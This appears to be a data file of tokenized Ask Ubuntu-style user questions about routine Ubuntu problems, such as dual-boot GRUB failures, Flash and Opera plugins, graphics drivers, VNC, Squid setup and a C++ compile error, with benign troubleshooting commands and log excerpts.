168941	how do i get a rosewill rk-8100 keyboard working ?	i am using this http : //www.newegg.com/product/product.aspx ? item=n82e16823201048 keyboard , it works fine in windows and other version of linux like puppy linux , but when ever i try using it on ubuntu or any ubuntu based distro , the lights on the keyboard work but none of the keys do . i have pluged in other keyboards and they work , so i do n't know what to think .
168943	how to install flash for opera browser ? ubuntu 12 04	for the opera : plugins setting its had been setup as enable to use the flash player .. and also i do trying to follow the instruction from i am testing the new opera 11 , but it keeps telling me i need to install flash player it still not help me .. what i have after following that link instructions is root @ santos : /home/santos # cp /usr/lib/flashplugin-installer/libflashplayer.so ~/.opera/plugins/libflashplayer.so cp : can not create regular file `/root/.opera/plugins/libflashplayer.so ' : no such file or directory root @ santos : /home/santos # sudo apt-get gecko-mediaplayer e : invalid operation gecko-mediaplayer root @ santos : /home/santos # cp /usr/lib/flashplugin-installer/libflashplayer.so ~/.opera/plugins/libflashplayer.so cp : can not create regular file `/root/.opera/plugins/libflashplayer.so ' : no such file or directory anyone can help me to solve this ?
168944	unable to install 12.04 on hp pavilion g6	i am using usb memory stick to install ubuntu 12.04 in my hp laptop . it has 1gb ati radeon graphics . as soon as i click install ubuntu or run ubuntu , the screen goes blank . i tried to open terminal mode using : ctrl+alt+f1 but that did n't help . does anyone have the same problem ? how do i resolve this ?
168947	how to upgrade g++ to 4.7.1 ?	richard holloway 's answer to this thread nicely explains how to upgrade from 4.6.3 to 4.7.0 ( on 12.04 , in my case ) but i would like to upgrade to 4.7.1 , which has been available for awhile . however there is no package g++-4.7.1 and i do n't know otherwise how to do it , does anyone else ?
168953	synaptic package manager language problem	my synaptic package manager is showing weird behavior like `` only synaptic manager is displayed in the chinese language '' and `` only it is shown in classic ui whereas every other application has theme applied on it '' attached is the image for it . can anyone tell solution to this problem ? thanks in advance
168957	is there a way to install ubuntu on usb pendrive as normal instalation ( not live cd ) ?	i would like to use ubuntu from a pendrive , but i read that it works like a live cd . i would like it to keep my files and new packages i install . is there a way to install ubuntu on the pendrive as if it were in an hd ?
168958	title bar is missing after closing wine	i 'm using wine only for chessbase 9 , and after i close the program , every windows ' titlebars are missing . if i type `` unity -- replace '' or `` unity -- reset '' in terminal , the title bars get back , but every time i use wine , they gone . i 'm using ubuntu 12.04 64bit , latest wine version , please help me .
168966	authentication problem during upgrade	i want to upgrade from ubuntu 10.10 to 11.04 . when i start upgrading , a window appeared with the following message : authentication failed there may be a problem with the network or with a server please guide me on how can i resolve this problem .
168970	ubuntu software center `` software requires mouse , but none setup '' win installing a purchased app	fresh install of ubuntu 12.04 64bit on asus laptop . everything works as expected except this odd warning .
168975	gnomemplayer accents displayed as `` ? `` , how i fix it ?	for some reason in gnomemplayer the accents in the subtitles are displayed as ' ? ' , is there a way to fix this problem ? what i 've tried : edit , preferences , language settings , i put everything into brazilian portuguese and utf-8 ... and i tried also the iso 8859-1 encoding . but after restarting the screen returns to iso 8859-15 . i use ubuntu 12.04 and my system language is brazilian portuguese . thanks e sorry for my bad english
168977	windows not booting in dual boot with ubuntu 12.04 and windows 7	i have dual ubuntu 12.04 and windows 7 installed in my pc . i installed ubuntu after windows , and i have issues with grub . after installing ubuntu , there was no boot loader in the start up , with an error message about missing os . i tried boot repair , i can see the grub loader now and can access ubuntu , uut i am not able to access windows , even though i can see that in grub loader . i tried to fix the windows start up with my windows live cd , but that removed the grub . what should i do in this case ?
168978	nautilus 3.4.2 want different colors for the pane with and without focus	i have nautilus 3.4.2 on ubuntu 12.04 . i use the second pane via f3 all the time . however , there is no colour change when i change which pane has the focus . there is on nautilus 2.30.1 , ubuntu 10.4 which is on my other machine . it is a poor fix to downgrade this machine , i would rather upgrade the other one . what do i do to change nautilus 3.4.2 to support different colours in the two panes , depending on which has focus ? e.g . : upgrade nautilus to one which has this feature ; downgrade nautilus ditto ; find a gtk theme which supports this because somehow my current theme does n't ... ? is it one of these answers ? thanks , john
168980	hp 6930p does not remember brightness control	i 'm running ubuntu 12.04 on hp 6930p and every time i reboot the system brightness control goes to back to some default value irrespective of the previous session . i 've gone through the earlier posts which suggests changing the following.. grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor '' grub_cmdline_linux= '' acpi_osi=linux '' this does n't work for me . any thoughts ?
168982	how do i get wireless wake-on-lan work with an intel 5100 agn ?	how can i make a wireless wol with intel pro/wireless 5100 agn from a hp laptop ?
168988	gvnccapture- installation	i want to capture virtual machine screenshot . i have installed xen hypervisor and i am controlling my virtual machines using libvirt-php api . it has a function : libvirt_domain_get_screenshot ( $ res ) ; when i execute it output : warning : libvirt_domain_get_screenshot ( ) [ function.libvirt-domain-get-screenshot ] : can not find gvnccapture binary in /opt/lampp/htdocs/xampp/myvms/vnc.php on line 9 so , i need to install gvnccapture binary . anyone knows how to get it using apt-get or any other way ?
168989	how can i format my hard drive to get rid of windows ?	i have downloaded ubuntu 12.04 and was hoping that when i booted off of my flash drive it would come up like it used to in 9.04 and would ask if you wanted to format your hard drive . but it did n't do it . how do i get it to let me format before installing ubuntu ?
168991	how does correct gamma color on external screen ? linux laptop	i have got a laptop and i would like to correct gamma color on my external screen . my system : laptop , vga port , linux , ubuntu . in option system- > preferences- > monitor i turn off my laptop 's screen . but bash-command xgamma -gamma 5 does not any effect . btw on laptop is ( if it will turn on ) too . how can i get it ?
168993	is 32 bit ubuntu installation necessary to install 64 bit ubuntu ?	i 'm going to install ubuntu 12.04 precise pangolin ( x64 ) and this article says it requires clean install from 32 bit . does it mean -- forgive me , i 'm turk and my english is not perfect -- `` first install 32 bit and then install 64 bit onto it ? ''
168997	how to select or deselect radio button in python / glade	as in topic , how can i select or deselect radio buttons in python . the application is made by quickly . any help pleas ?
169003	how to install an ati hd 4200 driver and make it work good ?	i keep wanting to use ubuntu 12.04 because it looks nice , but it sucks at running my graphics card , under windows 7 it works fine but under ubuntu my windows move laggy . i 've tried the compiz fix by un-checking vsync and something in open gl but it did n't work . pc specs : hp amd athlon ( tm ) 2 x4 635 processor 2.90 ghz 4.00 gigs of ram 64-bit ati radeon hd 4200 ubuntu used to work perfect until about 10.10 , i think unity or something messed it up , and the post release updates never work , it always says something about jockey messing up
169006	how can i install ubuntu ?	i want to switch over to ubuntu 12.04 os from windows7 . where from and how can i get an installation cd of this os , with an user manual.i do not know much about ubuntu and i am not very tech savvy as well . my current location is guwahati , ( assam ) , india . thanks and will remain highly obliged for the guidance .
169008	having issues while installing ubuntu using windows xp	dear ubuntu community , i have come across a strange problem while installing ubuntu 12.04lts version using wubi on my desktop having windows xp . there are four partition available in my desktop and i have used g : drive to install ubuntu . everytime , i use wubi to install and it downloads the ubuntu file and then extracts the files . however , it get stuck at the last minute of installation due to some temp folder issue . it always displays disk size issue and resizing error . for . e.g . when i tried 10g space , it got stuck at resizing disk space of 9744gb . the total space is 15gb available for ubuntu 12.04 . please guide me on the fix available for this issue as i have attempted trice to install and failed miserably . thanks for responding . however , i am facing a strange issue of not having it installed at all . at the time of installing ubuntu using wubi , it halts at the time of setup and shows some kind of error related temporary memory issue . i have taken snapshot and read the error log file but it was quite difficult for me to interpret and fix the issue . for anyone 's understanding , i can share / upload all screen shots and log file for correlation and offering me with a solution .
169012	vpn button stopped working : network manager plugin	i have openconnect and its network manager plugin installed . i have connected to vpn before using the slider button for vpn in the network manager . however the slider button to turn the vpn on is not working anymore . when i try and slide the button to the `` on '' state , it just does not move . on the other hand , the wireless and the wireless buttons both work . it seems to be some kind of bug with the network manager openconnect plugin . has anyone experienced this bug ? how do i start the openconnect dialog ( which will let me input the vpn login and password ) without the gui of network manager ?
169015	which ubuntu variant is recommended for an eee pc with a single-core atom and 1gb ram ?	i have an asus eee pc with a 1ghz intel atom processor and 1 gb ram with a 170gb hard drive . which would run better ubuntu xubuntu or lubuntu ? i had ubuntu for a few moments and it was really laggy and unresponsive .
169020	how do i download and install opera in 12.04 ?	i 've heard that we can use it . then how can i install it because i dont see it in the ubuntu software center .
169024	how can i tell if the virtualbox guest additions were installed on an ubuntu vm	how can i tell if the guest additions are installed on a virtualbox vm with no x. i 'm having a problem mounting a shared directory and i 'd like to rule out the possibility that the guest additions were n't installed .
169033	how to install icinga on ubuntu 12.04 & monitor remote host ?	how to install latest icinga & icinga-web on ubuntu server 12.04 & how to monitor remote hosts ?
169036	use nautilus with xfce as default file manager	i have found this question : how to stop thunar being default file browser i have installed xfce because i do n't like gnome that much . i am not finding thunar any good as it does n't support smb browsing and we have a selction of samba nas shares in the office ( so i really need it ) . i want to make nautilus my default file browser like it is under gnome , but after running the script linked in the answer of that previous question ( once to set thunar as the default [ which was already the case ] then again to change to nautilus ) , thunar is still the default and still after a reboot . what else do i need to change ? the other answer suggesting to run the following commands also has n't made a difference ; gconftool-2 -- set -- type=string /desktop/gnome/url-handlers/file/command 'nautilus `` % s '' ' gconftool-2 -- set -- type=bool /desktop/gnome/url-handlers/file/enabled true gconftool-2 -- set -- type=bool /desktop/gnome/url-handlers/file/need-terminal false i 'm rather stumped . i have also tried to ensure `` nautilus '' is configred by hand , in the correct files , have i missed any ? user @ machine : ~ $ cd /usr/share/applications user @ machine : /usr/share/applications $ grep -r nautil *.desktop brasero-nautilus.desktop : tryexec=nautilus brasero-nautilus.desktop : exec=nautilus -- no-default-window -- no-desktop burn : /// mount-archive.desktop : x-ubuntu-gettext-domain=nautilus nautilus-autorun-software.desktop : tryexec=nautilus-autorun-software nautilus-autorun-software.desktop : exec=nautilus-autorun-software % u nautilus-autorun-software.desktop : x-gnome-bugzilla-product=nautilus nautilus-autorun-software.desktop : x-ubuntu-gettext-domain=nautilus nautilus-browser.desktop : tryexec=nautilus nautilus-browser.desktop : exec=nautilus -- no-desktop -- browser % u nautilus-browser.desktop : x-gnome-bugzilla-product=nautilus nautilus-browser.desktop : x-ubuntu-gettext-domain=nautilus nautilus-computer.desktop : tryexec=nautilus nautilus-computer.desktop : exec=nautilus -- no-desktop computer : /// nautilus-computer.desktop : x-gnome-bugzilla-product=nautilus nautilus-computer.desktop : x-ubuntu-gettext-domain=nautilus nautilus.desktop : exec=nautilus nautilus.desktop : x-gnome-bugzilla-product=nautilus nautilus.desktop : x-ubuntu-gettext-domain=nautilus nautilus-file-management-properties.desktop : exec=nautilus-file-management-properties nautilus-file-management-properties.desktop : x-gnome-bugzilla-product=nautilus nautilus-file-management-properties.desktop : x-ubuntu-gettext-domain=nautilus nautilus-folder-handler.desktop : tryexec=nautilus nautilus-folder-handler.desktop : exec=nautilus -- no-desktop % u nautilus-folder-handler.desktop : x-gnome-bugzilla-product=nautilus nautilus-folder-handler.desktop : x-ubuntu-gettext-domain=nautilus nautilus-home.desktop : tryexec=nautilus nautilus-home.desktop : exec=nautilus -- no-desktop nautilus-home.desktop : x-gnome-bugzilla-product=nautilus nautilus-home.desktop : x-ubuntu-gettext-domain=nautilus network-scheme.desktop : tryexec=nautilus network-scheme.desktop : exec=nautilus -- no-desktop network : network-scheme.desktop : x-ubuntu-gettext-domain=nautilus xfce4-file-manager.desktop : exec=nautilus -- no-desktop % u if anyone can point out what 's going on here i would be very grateful . i can minimise this window , double click a desktop folder , and thunar pops up , its constantly taunting me ! user @ machine : ~ $ uname -a linux bensley-n2 2.6.32-41-generic # 94-ubuntu smp fri jul 6 16:51:39 utc 2012 i686 gnu/linux user @ machine : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 10.04.4 lts release : 10.04 codename : lucid
169039	how do i get squid to run as an anonymous proxy ?	i have just installed squid to make an anonymous proxy . i was n't able to connect to it , so i used the following commands in this exact order . start squid , the response : squid start/running , process 8988 status squid , the response : squid stop/waiting stop squid or restart squid , the response : stop : unknown instance : i 'm not sure what i could do to get it to run , but everything i have tried in the forums has led me nowhere .
169041	eclipse menu colors	i have just installed ubuntu 12.04 and i have made no modification to it . i have installed eclipse juno . when i press ctrl+o , the outline appears . however it appears as white letters over a black background . i doubt eclipse would have made this by default , it 's ugly and hard to read . it most likely takes a configuration from the os . how to change that to the usual black over white ? ps : sorry for briefly putting the first answer as my accepted answer . i thought it could solve the problem , but after trying , it actually does n't . can i get more help on that please ?
169049	how come java_home not automatically set for all users after installing openjdk-6 on ubuntu 12.04 ?	on a freshly installed box , java was not installed , so i installed openjdk-6 via apt-get install openjdk-6-jre openjdk-6-jdk . when i try to start my hadoop service , it complains that java_home is not set . is there something that needs to be done to get java_home set for all users ?
169051	will i be able to install ubuntu on windows 8 laptops/ultrabooks ?	i already know that arm devices with windows 8 will not allow to install another os . what about ultrabooks and laptops with windows 8 , will the secure boot prevent me from installing ubuntu ? i thought about buying a ubuntu laptop but unfortunatelly i still must buy windows license because of some software applications .
169052	can not boot : `` no init found . try passing init=bootarg ''	after losing power , my machine rebooted to this error : “error : no init found . try passing init=bootarg” per similar threads on this site and others , i 've tried booting from a cd and selecting `` try ubuntu '' . then open a terminal and typing : sudo fsck-y /dev/sda1 . the response is : device or resource busy while trying to open /dev/sda1 . filesystem mounted or opened exclusively by another program ? this is on ubuntu 10.10 . any ideas on what i can try next ?
169054	make terminal use pageup/pagedown instead of shift-pageup/shift-pagedown ?	i 've grown quite weary of shift-pgup to page up in gnome terminal , the command line , terminator , and guake , etc . any way to easily make these apps use the straight page-up and page-down keys for paging around ?
169055	unity logs out after logging back in from suspend	i 'm having an issue . it 's even repeatable by opening and closing my laptop to force suspends . after logging in 20 seconds to a few mins latter , unity will log out . upon logging back in , all of my programs are closed . no idea where to start with the error log . suggestions ? i looked at link to http : //ubuntuforums.org/showthread.php ? p=9284198 # post9284198 i did n't see where it was helpful . thanks in advance . here is my .xsession-errors.old : ackend : gconf integration : true profile : unity adding plugins initializing core options ... done initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing snap options ... done initializing mousepoll options ... done initializing resize options ... done initializing place options ... done initializing move options ... done initializing wall options ... done ** message : applet now removed from the notification area initializing grid options ... done i/o warning : failed to load external entity `` /home/erick/.compiz/session/10d797861e1335917c134317912576374900000021050033 '' initializing session options ... done initializing gnomecompat options ... done initializing animation options ... done initializing fade options ... done ** message : using fallback from indicator to gtkstatusicon initializing unitymtgrabhandles options ... done initializing workarounds options ... done initializing scale options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done ( compiz:2173 ) : gconf-critical ** : gconf_client_add_dir : assertion `gconf_valid_key ( dirname , null ) ' failed initializing unityshell options ... done setting update `` main_menu_key '' setting update `` run_key '' setting update `` autohide_animation '' ** message : moving back from gtkstatusicon to indicator ** ( zeitgeist-datahub:2638 ) : warning ** : zeitgeist-datahub.vala:227 : unable to get name `` org.gnome.zeitgeist.datahub '' on the bus ! ** ( gnome-screensaver:2639 ) : warning ** : screensaver already running in this session [ 2426:2537:50442055 : error : download_updates_command.cc ( 99 ) ] postclienttoservermessage ( ) failed during getupdates [ 2426:2537:52443452 : error : download_updates_command.cc ( 99 ) ] postclienttoservermessage ( ) failed during getupdates ** ( nautilus:2195 ) : warning ** : error calling current_status : method `` current_status '' with signature `` '' on interface `` com.ubuntuone.syncdaemon.status '' does n't exist ** ( nautilus:2195 ) : critical ** : syncdaemon_status_info_get_online : assertion `syncdaemon_is_status_info ( sinfo ) ' failed [ 2426:2537:57445240 : error : download_updates_command.cc ( 99 ) ] postclienttoservermessage ( ) failed during getupdates [ 2426:2537:61716091 : error : download_updates_command.cc ( 99 ) ] postclienttoservermessage ( ) failed during getupdates [ 2426:2537:69717992 : error : download_updates_command.cc ( 99 ) ] postclienttoservermessage ( ) failed during getupdates [ 2426:2537:81720581 : error : download_updates_command.cc ( 99 ) ] postclienttoservermessage ( ) failed during getupdates compiz ( decor ) - warn : failed to bind pixmap to texture ( bluetooth-applet:2190 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( bluetooth-applet:2190 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . compiz ( decor ) - warn : failed to bind pixmap to texture compiz ( decor ) - warn : failed to bind pixmap to texture ( bluetooth-applet:2190 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( bluetooth-applet:2190 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( bluetooth-applet:2190 ) : gdk-warning ** : bluetooth-applet : fatal io error 11 ( resource temporarily unavailable ) on x server :0. gnome-session [ 2105 ] : gdk-warning : gnome-session : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . ( nm-applet:2198 ) : gdk-warning ** : nm-applet : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . ( gnome-fallback-mount-helper:2191 ) : gdk-warning ** : gnome-fallback-mount-helper : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . ( nautilus:2195 ) : gdk-warning ** : nautilus : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . ( polkit-gnome-authentication-agent-1:2192 ) : gdk-warning ** : polkit-gnome-authentication-agent-1 : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . ( gnome-settings-daemon:2152 ) : gdk-warning ** : gnome-settings-daemon : fatal io error 11 ( resource temporarily unavailable ) on x server :0. gtk-window-decorator : fatal io error 11 ( resource temporarily unavailable ) on x server :0.0 . [ 4600:4600:911100154 : error : chrome_browser_main_x11.cc ( 62 ) ] x io error detected ( telepathy-indicator:2572 ) : gdk-warning ** : telepathy-indicator : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . ( gdu-notification-daemon:2422 ) : gdk-warning ** : gdu-notification-daemon : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . ( update-notifier:2724 ) : gdk-warning ** : update-notifier : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . ( gnome-terminal:4761 ) : gdk-warning ** : gnome-terminal : fatal io error 104 ( connection reset by peer ) on x server :0. thunderbird : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . ( deja-dup-monitor:3384 ) : gvfs-remotevolumemonitor-warning ** : owner :1.29 of volume monitor org.gtk.private.gduvolumemonitor disconnected from the bus ; removing drives/volumes/mounts ( deja-dup-monitor:3384 ) : gvfs-remotevolumemonitor-warning ** : owner :1.31 of volume monitor org.gtk.private.afcvolumemonitor disconnected from the bus ; removing drives/volumes/mounts ( deja-dup-monitor:3384 ) : gvfs-remotevolumemonitor-warning ** : owner :1.32 of volume monitor org.gtk.private.gphoto2volumemonitor disconnected from the bus ; removing drives/volumes/mounts
169058	dual monitor & cursor	i 'm running ubuntu 12.04 with dual monitor set up . i 'm running unity with launcher only on my primary monitor with the auto hide option disabled . so my launcher appears on my primary monitor forever . i used to have my secondary monitor to my right and it all worked perfectly . recently i changed the orientation of my monitors such that my secondary monitor is towards my left . in-order to bring the mouse pointer to the monitor on my left i need to move it the right end of my primary screen . to be short my mouse pointer moves only towards the right of my primary monitor and its not moving to the left . i looked for settings in ubuntu tweak app and ccsm . i could n't find one to change the setting . is there any way to change this ? any help will be greatly appreciated ! !
169059	which hardware manufacturers are more friendly to ubuntu , besides intel ?	so by the end of the year , i will buy an ultrabook to replace my heavy laptop which i have to carry almost everyday . i sure hope that microsoft does n't lock linux users out with their secure-boot on x86 devices . anyway , when i started using ubuntu , i did n't understand a lot about linux , but it was strange for me to see so many people complaining on the internet about issues with drivers , graphic cards , overheating while using ubuntu . i never had such problems , ever since i installed ubuntu ( started on 11.04 ) , it always adapted just fine on my toshiba laptop . then i realized that ubuntu works great out of the box on my laptop because i have intel dual-core and onboard graphics , which means i have a system that has no proprietary drivers , intel drivers are not closed . i understood that it is very important to pick carefully the manufacturers in order to have a great experience with ubuntu and avoid some headaches with incompatibilities ( as nvidia for example ) . so , besides intel , which other hardware manufacters are more friendly to linux ( ubuntu in particular ) ?
169066	all drivers disabled after reinstallation	i 've been running ubuntu 12.04 for quite a while , but after installing windows xp onto another partition , the mbr was overwritten , etc etc . i downgraded 12.04 to 11.10 using a live cd , but it still did n't work . used boot-repair then reinstalled 11.10 , and i got grub back . yes ! so , i booted ubuntu , and found that i had no control over anything except the keyboard . the touchpad , usb mouse , disk drive , usb anything , wireless card , all gone . this naturally means that i ca n't get anything onto the hard drive without lots of shenanigans using the live cd . i 've got a gateway w340ui . eager to get 12.04 back .
169072	fullscreen youtube videos lagging a lot	in my pc , i can watch youtube videos without any problem . however , they lag so much on fullscreen , that it 's basically impossible to watch them . how can i fix this ?
169073	external hard drive not allowing permission	my older mac recently kicked the bucket , and i decided to switch to linux on a newer laptop , my hard drive was fine , and i now use it as an external hard drive . the one problem though , is that i can not access any of my files . i 've tried getting permission and it says that i am not root , therefore i ca n't make any changes . what do i do ?
169079	lock mono application to launcher	i have mono application .exe ( keepass ) also i have following script to launch it : ( keepass.sh ) # ! /bin/sh mono `dirname $ 0`/keepass.exe now i want to lock it in my launcher . but when i do it using ( right click - > lock to launcher ) and click to it nothing happen . what can i do ?
169085	can i force ubuntu one to sync a file ?	i set up the documents folder to sync in ubuntu one a few months ago . last week i made some modifications to a file in that folder . according to this question will ubuntu one sync if i update files in my local directory ? , i understand that ubuntu one is supposed to sync my modifications . but now , i 've set up ubuntu one on another system in order to sync the folder . but i 've found out that my modification were n't uploaded to ubuntu one , as i received the older , unmodified version of my file . so my question , since that file was n't updated , is there a way to find out if there were any other files that also were n't updated and can i force them to be synced and updated ?
169086	recovery of ( possibly ) dying ssd	i 'm trying to recover an image of an ssd i think may be dying ( it 's an ocz petrol ) . it 's got win7 installed at the moment , but i 'm using a range of linux tools to try to recover it , hence asking here . everything i refer to is obtained from system rescue cd . looking at the ssd in gparted , it 's reported as having 98 bad sectors . various tools to try and create a backup image have failed as a result of this , including partimage , clonezilla and the simple dd . eventually , ntfsclone -- rescue succeed in generating a recovery image which i restored to another partition to confirm correct imaging , which it turns out was good . looking at that partition though , the bad sectors appear to have come with the image , and that partition is reported as having 98 bad sectors too . booting from windows , chkdisk reports that both partitions are fine and have no problems . do i need to be concerned by any of this , or are these bad sector reports essentially `` phantom '' ? is some of this perhaps due to incomplete handling of ntfs ?
169090	add folder as menu to gnome panel	i would like to add a folder to a gnome panel ( gnome fallback on ubuntu 12.04 ) . in windows this can be accomplished by right-clicking the taskbar , selecting `` new toolbar '' , and browsing for a folder . i would like the same functionality in ubuntu . when i click on an icon in the panel , i should get something that looks like the `` applications '' menu , but with the content of a specific folder instead .
169091	how to configure vnc on a remote ubuntu server ?	i am currently in the process of creating a ubuntu server with rackspace cloud and i am trying to configure this server for vnc over ssh on my macbook air . here is a summary of what i am trying to accomplish . server details : ubuntu 12.04 hosted by rackspace ( no physical access ) need to run gnome3 vnc connection must be over ssh any guides or assistance would be great , i have installed gnome3 and vino for the vnc-server . i 'm just not sure how to configure vnc properly . i 've looked online but i 'm stuck at the vnc-server portion .
169092	c++ programs are not working properly	/* write a prog to take the name of the user and output it with a thank you stamement*/ # include < iostream > using namespace std ; int main ( ) { char ch [ 20 ] ; cout < < `` enter your name pls '' < < endl ; cin > > ch > > endl ; cout < < `` thank you : : '' < < ch < < endl ; return 0 ; } output is : ff @ ff-desktop : ~/cccp/ch1 $ g++ 2.cpp -o 2 2.cpp : in function ‘int main ( ) ’ : 2.cpp:9 : error : no match for ‘operator > > ’ in ‘std : :operator > > [ with _chart = char , _traits = std : :char_traits < char > ] ( ( ( std : :basic_istream < char , std : :char_traits < char > > & ) ( & std : :cin ) ) , ( ( char & ) ( & ch ) ) ) > > std : :endl’ /usr/include/c++/4.4/istream:119 : note : candidates are : std : :basic_istream < _chart , _traits > & std : :basic_istream < _chart , _traits > : :operator > > ( std : :basic_istream < _chart , _traits > & ( * ) ( std : :basic_istream < _chart , _traits > & ) ) [ with _chart = char , _traits = std : :char_traits < char > ] /usr/include/c++/4.4/istream:123 : note : std : :basic_istream < _chart , _traits > & std : :basic_istream < _chart , _traits > : :operator > > ( std : :basic_ios < _chart , _traits > & ( * ) ( std : :basic_ios < _chart , _traits > & ) ) [ with _chart = char , _traits = std : :char_traits < char > ] /usr/include/c++/4.4/istream:130 : note : std : :basic_istream < _chart , _traits > & std : :basic_istream < _chart , _traits > : :operator > > ( std : :ios_base & ( * ) ( std : :ios_base & ) ) [ with _chart = char , _traits = std : :char_traits < char > ] /usr/include/c++/4.4/istream:166 : note : std : :basic_istream < _chart , _traits > & std : :basic_istream < _chart , _traits > : :operator > > ( bool & ) [ with _chart = char , _traits = std : :char_traits < char > ] /usr/include/c++/4.4/istream:170 : note : std : :basic_istream < _chart , _traits > & std : :basic_istream < _chart , _traits > : :operator > > ( short int & ) [ with _chart = char , _traits = std : :char_traits < char > ] /usr/include/c++/4.4/istream:173 : note : std : :basic_istream < _chart , _traits > & std : :basic_istream < _chart , _traits > : :operator > > ( short unsigned int & ) [ with _chart = char , _traits = std : :char_traits < char > ] /usr/include/c++/4.4/istream:177 : note : std : :basic_istream < _chart , _traits > & std : :basic_istream < _chart , _traits > : :operator > > ( int & ) [ with _chart = char , _traits = std : :char_traits < char > ] /usr/include/c++/4.4/istream:180 : note : std : :basic_istream < _chart , _traits > & std : :basic_istream < _chart , _traits > : :operator > > ( unsigned int & ) [ with _chart = char , _traits = std : :char_traits < char > ] /usr/include/c++/4.4/istream:184 : note : std : :basic_istream < _chart , _traits > & std : :basic_istream < _chart , _traits > : :operator > > ( long int & ) [ with _chart = char , _traits = std : :char_traits < char > ] /usr/include/c++/4.4/istream:188 : note : std : :basic_istream < _chart , _traits > & std : :basic_istream < _chart , _traits > : :operator > > ( long unsigned int & ) [ with _chart = char , _traits = std : :char_traits < char > ] /usr/include/c++/4.4/istream:193 : note : std : :basic_istream < _chart , _traits > & std : :basic_istream < _chart , _traits > : :operator > > ( long long int & ) [ with _chart = char , _traits = std : :char_traits < char > ] /usr/include/c++/4.4/istream:197 : note : std : :basic_istream < _chart , _traits > & std : :basic_istream < _chart , _traits > : :operator > > ( long long unsigned int & ) [ with _chart = char , _traits = std : :char_traits < char > ] /usr/include/c++/4.4/istream:202 : note : std : :basic_istream < _chart , _traits > & std : :basic_istream < _chart , _traits > : :operator > > ( float & ) [ with _chart = char , _traits = std : :char_traits < char > ] /usr/include/c++/4.4/istream:206 : note : std : :basic_istream < _chart , _traits > & std : :basic_istream < _chart , _traits > : :operator > > ( double & ) [ with _chart = char , _traits = std : :char_traits < char > ] /usr/include/c++/4.4/istream:210 : note : std : :basic_istream < _chart , _traits > & std : :basic_istream < _chart , _traits > : :operator > > ( long double & ) [ with _chart = char , _traits = std : :char_traits < char > ] /usr/include/c++/4.4/istream:214 : note : std : :basic_istream < _chart , _traits > & std : :basic_istream < _chart , _traits > : :operator > > ( void* & ) [ with _chart = char , _traits = std : :char_traits < char > ] /usr/include/c++/4.4/istream:238 : note : std : :basic_istream < _chart , _traits > & std : :basic_istream < _chart , _traits > : :operator > > ( std : :basic_streambuf < _chart , _traits > * ) [ with _chart = char , _traits = std : :char_traits < char > ] /usr/include/c++/4.4/istream:741 : note : std : :basic_istream < _chart2 , _traits2 > & std : :operator > > ( std : :basic_istream < _chart2 , _traits2 > & , _chart2* ) [ with _chart2 = char , _traits2 = std : :char_traits < char > , _chart = char , _traits = std : :char_traits < char > ] /usr/include/c++/4.4/bits/istream.tcc:853 : note : std : :basic_istream < _chart , _traits > & std : :operator > > ( std : :basic_istream < _chart , _traits > & , _chart & ) [ with _chart = char , _traits = std : :char_traits < char > ] ff @ ff-desktop : ~/cccp/ch1 $ can anyone please tell me what 's wrong ? actionparsnip ( andrew-woodhead666 ) suggested this : try changing : # include < iostream > to : # include `` iostream '' or try : # include < iostream.h > or : # include `` iostream.h '' and after doing these changes , i got the following . here is the output for the same program above , with `` iostream.h '' instead of < iostream.h > : 2.cpp:2:21 : error : iostream.h : no such file or directory 2.cpp : in function ‘int main ( ) ’ : 2.cpp:8 : error : ‘cout’ was not declared in this scope 2.cpp:8 : error : ‘endl’ was not declared in this scope 2.cpp:9 : error : ‘cin’ was not declared in this scope can anyone please help in this and suggest me whats wrong ?
169095	is there any advantage of using google chrome over chromium ?	i have n't tried chrome yet on ubuntu 12.04 , i am a little worried about privacy issues , but other than that , what would google chrome have that chromium does not provide ? does google chrome run great on ubuntu ?
169102	what do the ubuntu webapps technology offer	i started hearing about the webapp technologies a couple of days ago and from what i have heard they look good . they will somehow integrate ubuntu with web apps and technologies . but : how will they integrate into ubuntu ? how can the user use this integrated web technologies ( where would the menu options be , what options , password , user stuff do i need to add/activate/type in a form ) ? how will the integration of this webapp technologies benefit the user ? what are the pros/cons in this new ubuntu changes ? will askubuntu , ubuntu forum and other ubuntu user sites integrate as well ?
169108	windows 7 pro wo n't load after installing ubuntu 12.04 lts	so i installed ubuntu 12.04 lts 64-bit using the dvd . i followed linuxbsdos guide for dual booting windows 7 ( first installed ) and ubuntu 12.04 ( second install ) on 2 separate hard drives . i had windows 7 pro installed on /dev/sda1 . i installed ubuntu on /dev/sdb/ ( i created separate partitions for root , home , boot , swap following that linuxbsdos guide ) . i boot into ubuntu fine , but can not boot into windows 7 . here is what i 've tried so far : ran boot-repair and did recommended repair , but it said you need a bios boot partition and i should use gparted . ( bootinfo summary : http : //paste.ubuntu.com/1114662/ ) tried to do a windows recovery cd repair using bootrec.exe /fixmbr and /fixboot . ( when i did fixboot , i got element not found error ) . tried to install grub-2.00 onto /dev/sdb/ following this guide : http : //www.liberiangeek.net/2012/07/how-to-install-grub-2-00-in-ubuntu-12-04-precise-pangolin/ error message : warning : this gpt partition label contains no bios boot partition ; embedding wo n't be possible . /usr/sbin/grub-bios-setup : warning : embedding is not possible . grub can only be installed in this setup by using blocklists . however , blocklists are unreliable and their use is discouraged.. /usr/sbin/grub-bios-setup : error : will not proceed with blocklists . so i 'm at a loss at this point on what to do ? i know i have grub on /dev/sde/ , that is a 3rd ssd that had fedora 17 on it , but i had a lot of problems using it so i wanted to switch to ubuntu for school purposes . i intend to format /dev/sde/ and use it in windows .
